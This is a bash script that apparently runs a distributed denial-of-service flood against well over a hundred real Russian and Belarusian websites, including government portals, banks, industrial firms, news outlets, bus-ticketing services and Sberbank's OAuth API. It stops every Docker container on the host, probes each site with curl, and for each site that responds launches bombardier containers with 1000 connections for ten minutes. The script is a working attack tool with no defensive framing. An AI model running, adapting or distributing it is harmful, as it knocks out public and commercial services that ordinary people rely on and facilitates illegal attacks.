#!/bin/bash

# Configuration of Bombardier
BOMBARDIER_TIMEOUT=600s
BOMBARDIER_CONNECTIONS=1000

declare -a sites=(
"https://www.gazprom.ru/"
"https://lukoil.ru"
"https://magnit.ru/"
"https://www.nornickel.com/"
"https://www.surgutneftegas.ru/"
"https://www.tatneft.ru/"
"https://www.evraz.com/ru/"
"https://nlmk.com/"
"https://www.sibur.ru/"
"https://www.severstal.com/"
"https://www.metalloinvest.com/"
"https://nangs.org/"
"https://rmk-group.ru/ru/"
"https://www.tmk-group.ru/"
"https://ya.ru/"
"https://www.polymetalinternational.com/ru/"
"https://www.uralkali.com/ru/"
"https://www.eurosib.ru/"
"https://omk.ru/"
"https://www.sberbank.ru"
"https://www.vtb.ru/"
"https://www.gazprombank.ru/"
"https://www.gosuslugi.ru/"
"https://www.mos.ru/uslugi/"
"http://kremlin.ru/"
"http://government.ru/"
"https://mil.ru/"
"https://www.nalog.gov.ru/"
"https://customs.gov.ru/"
"https://pfr.gov.ru/"
"https://rkn.gov.ru/"
"https://bus.tutu.ru"
"https://busfor.ru/"
"https://www.blablacar.ru/"
"https://www.avtovokzaly.ru/"
"https://bus-69.ru/"
"https://bus.biletyplus.ru/"
"http://78bus.ru/"
"https://severnye-vorota.ru/"
"https://busnovoyas.ru/"
"https://nevskiy-express.ru/"
"https://autobus-moskva.ru/"
"https://ros-bilet.ru/"
"https://xn--d1abb2a.xn--p1ai/"
"https://movibus.ru/"
"https://volgaline34.ru/"
"https://buybusticket.ru/"
"https://donavto.ru/"
"https://rostov-transport.info/"
"https://www.bustime.ru/"
"https://rov.aero/"
"https://avtovokzal-volgograd.ru/"
"https://www.tourister.ru/"
"https://www.mosgortrans.ru/"
"https://www.avokzal.ru/"
"https://www.autovokzal.org"
"https://www.flixbus.ru/"
"https://tochka-na-karte.ru/"
"https://avtovokzal.gomel.by/"
"https://minsktrans.by/"
"https://kogda.by/"
"https://busfor.by/"
"https://avgrodno.by/"
"https://by.tutu.travel/"
"https://minsk-avtovokzal.by/"
"https://ticketbus.by/"
"https://taf.by/"
"https://gomel-minsk.by/"
"https://tickets.by/"
"https://star-bus.ru/"
"https://kaktustour.com/"
"https://618.by/"
"http://busik24.com/"
"https://2y.by/"
"https://travel-kassa.ru/"
"https://av.brest.by/"
"https://avtovokzal-mogilev.by/"
"https://ecolines.by/"
"https://www.mts.by"
"https://donavto.ru/"
"https://rostov-transport.info/"
"https://www.bustime.ru/"
"https://rov.aero/"
"https://avtovokzal-volgograd.ru/"
"https://ros-bilet.ru/"
"https://rosukrbus.com/"
"https://www.moscowbus.ru/"
"http://78bus.ru/"
"http://busik24.com/"
"https://2y.by/"
"https://618.by/"
"https://autobus-moskva.ru/"
"https://av.brest.by/"
"https://avgrodno.by/"
"https://avtovokzal-mogilev.by/"
"https://avtovokzal-volgograd.ru/"
"https://avtovokzal-volgograd.ru/"
"https://avtovokzal.gomel.by/"
"https://bus-69.ru/"
"https://bus.biletyplus.ru/"
"https://bus.tutu.ru"
"https://busfor.by/"
"https://busfor.ru/"
"https://busnovoyas.ru/"
"https://buybusticket.ru/"
"https://by.tutu.travel/"
"https://donavto.ru/"
"https://donavto.ru/"
"https://ecolines.by/"
"https://ecolines.net/"
"https://gomel-minsk.by/"
"https://kaktustour.com/"
"https://kogda.by/"
"https://minsk-avtovokzal.by/"
"https://minsktrans.by/"
"https://movibus.ru/"
"https://nevskiy-express.ru/"
"https://ros-bilet.ru/"
"https://ros-bilet.ru/"
"https://rostov-transport.info/"
"https://rostov-transport.info/"
"https://rosukrbus.com/"
"https://rov.aero/"
"https://rov.aero/"
"https://severnye-vorota.ru/"
"https://star-bus.ru/"
"https://taf.by/"
"https://ticketbus.by/"
"https://tickets.by/"
"https://tochka-na-karte.ru/"
"https://travel-kassa.ru/"
"https://volgaline34.ru/"
"https://www.autovokzal.org"
"https://www.avokzal.ru/"
"https://www.avtovokzaly.ru/"
"https://www.blablacar.ru/"
"https://www.bustime.ru/"
"https://www.bustime.ru/"
"https://www.flixbus.ru/"
"https://www.moscowbus.ru/"
"https://www.mosgortrans.ru/"
"https://www.mts.by"
"https://www.tourister.ru/"
"https://xn--d1abb2a.xn--p1ai/"
"https://mail.rkn.gov.ru/"
"https://cloud.rkn.gov.ru"
"https://mvd.gov.ru"
"https://pwd.wto.economy.gov.ru/"
"https://stroi.gov.ru/"
"https://proverki.gov.ru/"
"https://www.ria.ru"
"https://www.gazeta.ru"
"https://www.kp.ru"
"https://www.riafan.ru"
"https://www.pikabu.ru"
"https://www.kommersant.ru"
"https://www.mk.ru"
"https://www.yaplakal.com"
"https://www.rbc.ru"
"https://www.bezformata.com"
"https://api.sberbank.ru/prod/tokens/v2/oauth"
"https://api.sberbank.ru/prod/tokens/v2/oidc"
)

echo "Stop all containers"
docker stop $(docker ps -aq)
echo "Docker containers stopped"

echo "Run ddos for all sites"
for site in "${sites[@]}"
do
    status_code=$(curl -m 2 -o /dev/null -s -w "%{http_code}\n" "$site")
    status_code=$( expr "$status_code" + 0)

    # If status code is zero site is already blocked

    site_status="${site} status code ${status_code}"
    echo "$site_status"
    if  (("$status_code" != 0 && "$status_code" <= 400)); then
    echo "Must be destroyed"
    docker run -ti -d --rm alpine/bombardier -c "$BOMBARDIER_CONNECTIONS" -d "$BOMBARDIER_TIMEOUT" -l "$site"
    fi

done
